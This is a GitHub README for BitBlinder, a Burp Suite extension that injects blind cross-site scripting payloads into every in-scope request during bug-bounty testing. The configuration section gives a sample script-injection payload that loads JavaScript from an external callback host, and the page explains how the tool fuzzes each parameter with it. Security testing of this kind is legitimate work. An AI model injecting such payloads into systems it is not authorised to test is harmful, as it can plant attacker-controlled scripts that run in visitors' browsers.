Skip to content

BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities

Notifications You must be signed in to change notification settings

BitTheByte/BitBlinder

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 

Repository files navigation

BitBlinder

THIS TOOLS IS IN EARLY BETA USE IT ON YOUR OWN RISK
Burp extension helps in finding blind xss vulnerabilities by injecting xss payloads in every request passes throw BurpSuite

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
-  Developer: Ahmed Ezzat (BitTheByte)      -
-  Github:    https://github.com/BitTheByte -
-  Version:   0.05b                         -
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
[WARNING] MAKE SURE TO EDIT THE SETTINGS BEFORE USE
[WARNING] THIS TOOL WILL WORK FOR IN-SCOPE ITEMS ONLY
[WARNING] THIS TOOL WILL CONSUME TOO MUCH BANDWIDTH

Configuration

Go to Bit blinder tab then enable it
Set your payloads (line separated)

"><script%20src="https://myusername.xss.ht"><script>
"><script%20src="https://myusername.xss.ht"><script>
...

If you added more than 1 payload enable the randomization button
If you want to keep it disabled keep in mind that the tool will use the first payload only

How to use

  1. Load the extension to your burpsuite
  2. Click on Bit blinder tab then enable it
  3. Add your target to scope It'll only work for inscope items
  4. Continue your hunting session Make sure to do alot of actions [Forms,Search,...]
  5. Monitor the output in extension's output tab

Note: By the nature of this tool it'll make alot of requests so you may get blocked by WAF or experience slow internet connection

In a nutshell

When user visits https://example.com?vuln=123&vuln2=abc
This tool will generate the following 2 requests (in the background without effecting the current session)

  1. https://example.com?vuln=[YOUR_XSS_PAYLOAD]&vuln2=abc
  2. https://example.com?vuln=123&vuln2=[YOUR_XSS_PAYLOAD]

The previous example also applies to POST parameters

Current version

Version 0.05b

TO-DO (By priority)

  • GUI ✓ ( A very ugly one for now.. )
  • Fix endless request loops ✓
  • Injection in headers
  • Option to exclude paramters/hosts/endpoints
  • Better output/logging system

About

BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages